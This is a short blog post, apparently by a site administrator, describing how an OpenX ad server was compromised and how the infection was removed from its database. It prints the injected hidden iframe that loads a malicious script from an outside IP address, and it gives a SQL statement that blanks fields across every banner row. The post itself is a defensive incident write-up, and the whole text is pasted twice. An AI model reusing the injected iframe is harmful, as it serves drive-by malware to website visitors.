OpenX – security problem with malware hack

I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `my_db`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!I hit me cold when I saw the virus-scanner’s red message was jumping on the screen. Administering www.weimar.de it is no fun, having a virus-warning on the frontpage of an official website.

The reason was OpenX, Version 2.8.1. which I updated to 2.8.5. – which seemed too late since the database was affected. I got this code within my banner-js:

<"+"iframe src=\"http://194.8.250.211/tds/in.cgi?default\" width=\"1\" height=\"1\" hspace=\"0\" vspace=\"0\" frameborder=\"0\" scrolling=\"no\"><"+"/iframe>

Checking all php-files (no, actually most important these three:

  • /var/yourdomain.conf.php
  • /adjs.php
  • /www/delivery/ajs.php

)

I found nothing. Check it anyway, because in some cases it’s a direct hack within those files (at the very beginning or the end).

So I checked my database , the table phpads_banners (or openx_banners) and found nothing obvious. The malicious code is hidden within the BLOB-fields (which content you can only see if enabled within myPhpAdmin) and therefore there’s one thing you can do: Set the fields:

  • prepend
  • append
  • html_cache
  • html_template

empty!

I rigourously cleared out all the sh*t by doing this simple statement:

UPDATE `web2_db5`.`phpads_banners` SET `append` = NULL,`prepend` = NULL,`htmltemplate` = NULL, `htmlcache` = NULL WHERE 1;

Good luck!


Weitere...

Wie schnell man zum Mörder wird Es ist ein politisches Urteil. Zwei Berliner, 25 und 28 Jahre alt, wurden gestern zu lebenslangen Haftstrafen verurteilt. Sie waren mit bis zu 160km/h...
"Denn Politik ist gestern und heute mehr denn je das, als was die Kyniker der zerfallenden griechischen Stadtgemeinschaften sie erlebten: ein bedrohli...
Das gute Oel… Hand auf's Herz: Was sorgt Sie als Deutscher, wenn BP tausende Tonnen Öl im Atlantik verliert? Vielleicht das: oder eher das: ?

Dieser Post ist auch verfügbar auf: Englisch

Kommentar verfassen